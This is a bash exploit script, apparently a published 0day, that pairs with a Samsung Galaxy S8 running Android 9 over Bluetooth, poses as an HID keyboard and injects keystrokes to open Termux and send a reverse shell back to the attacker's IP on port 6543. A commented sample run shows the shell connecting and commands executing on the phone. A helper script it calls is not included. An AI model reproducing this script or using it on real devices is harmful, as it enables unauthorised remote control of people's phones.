#PHONE="08:AE:D6:6F:DD:F8" #LOCAL_IP="10.0.2.2" # oxagast / Marshall Whittaker # 0day as of Apr 21, 2023 # if you get caught using this... # In loving memory of Jason Reynolds aka Gemani # Hope the computers are faster wherever you're at bro! # # Tested on a Samsung Galaxy S8 running Android 9 # Termux must be installed on the device. # # [?] Samsung S8 android 9 HID controller exploit # [?] Tested on Build PPR1.180610.001.G950USQU8DUJ1 # [?] In memory of Jason Reynolds / Gemani # # [*] Building reverse shell for 10.0.2.2:6543 # [*] Pairing to 08:AE:D6:6F:DD:F8 # [!] Paired 08:AE:D6:6F:DD:F8 to DC:53:60:6C:FC:B3 # [!] Go to another terminal and start a netcat listener on port to handle the shell! # [*] Registered HID profile # [!] Ready, waiting for connection from phone # [*] Control channel connected to 08:AE:D6:6F:DD:F8 # [*] Interrupt channel connected to 08:AE:D6:6F:DD:F8 # [!] Building shell... # [*] Trying to attain control over device... # [*] Sending back to home screen... # [*] Trying to pull up finder... # [*] Trying to find termux... # [*] Pushing shellcode now... # listening on [any] 6543 ... # ^C # [!] Trying again... # listening on [any] 6543 ... # connect to [10.0.2.2] from nerkon [10.0.2.5] 51818 # ~ $ ls -al # ls -al # total 16 # drwx------ 3 u0_a466 u0_a466 4096 Apr 20 21:15 . # drwxrwx--x 4 u0_a466 u0_a466 4096 Apr 20 21:12 .. # -rw------- 1 u0_a466 u0_a466 1334 Apr 21 23:52 .bash_history # drwx------ 2 u0_a466 u0_a466 4096 Apr 20 21:12 .termux # ~ $ uname -a; id # uname -a; id # Linux localhost 4.4.153-17214672 #2 SMP PREEMPT Thu Oct 21 19:08:15 KST 2021 aarch64 Android # uid=10466(u0_a466) gid=10466(u0_a466) groups=10466(u0_a466),3003(inet),9997(everybody),20466(u0_a466_cache),50466(all_a466) # ~ $ # PHONE=$1 LOCAL_IP=$2 if [ $# -eq 2 ]; then echo "[?] Samsung S8 android 9 HID controller exploit" echo "[?] Tested on Build PPR1.180610.001.G950USQU8DUJ1" echo "[?] In memory of Jason Reynolds / Gemani" echo echo "[*] Building reverse shell for ${LOCAL_IP}:6543" echo "[*] Pairing to ${PHONE}" CONTR=`echo "power on\n\nshow\n\ndiscoverable on\n\npair ${PHONE}\n\ntrust ${PHONE}\n\nconnect ${PHONE}\n\n" | bluetoothctl | grep Controller | cut -d ' ' -f 2` echo "[!] Paired ${PHONE} to ${CONTR}" echo "[!] Go to another terminal and start a netcat listener on port ${LOCAL_PORT} to handle the shell!" python3 rougetooth.py "${CONTR}" "${PHONE}" "${LOCAL_IP}" else echo "Sorry, the syntax is $0 [PHONE BT MAC] [LOCAL IP]" fi